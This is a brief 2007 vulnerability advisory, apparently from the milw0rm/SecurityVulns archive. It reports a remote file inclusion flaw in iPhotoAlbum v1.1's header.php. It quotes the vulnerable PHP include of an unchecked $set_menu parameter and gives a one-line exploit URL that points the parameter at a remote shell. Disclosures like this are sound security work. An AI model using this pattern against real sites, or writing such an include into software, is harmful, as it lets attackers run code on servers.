iPhotoAlbum v1.1(header.php)Remote File Include Vulnerability

2007-04-02T00:00:00
ID SECURITYVULNS:DOC:16537
Type securityvulns
Reporter Securityvulns
Modified 2007-04-02T00:00:00

Description

iPhotoAlbum v1.1(header.php)Remote File Include Vulnerability

D.Script: http://sourceforge.net/projects/iphotoalbum/

Discovered by: GloD_M = [Mahmood_ali]

Homepage: http://www.Tryag.cc

V.Code

<?php if(isset($set_menu)) { include("$set_menu"); } ?>

Exploit:[Path]/lib/static/header.php?set_menu=SheLL

Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group

Thanx: w4ck1ng.com & h4cky0u.org & t0pP8uZz

milw0rm.com [2007-03-28]